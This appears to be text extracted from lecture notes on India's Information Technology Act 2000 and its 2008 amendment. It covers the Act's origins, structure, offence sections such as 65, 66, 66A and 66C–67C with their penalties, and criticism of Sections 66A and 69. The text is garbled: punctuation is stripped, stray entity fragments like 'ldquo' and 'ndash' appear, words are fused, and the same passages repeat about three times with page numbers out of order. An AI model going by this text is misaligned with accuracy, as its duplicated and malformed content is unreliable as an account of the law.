has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime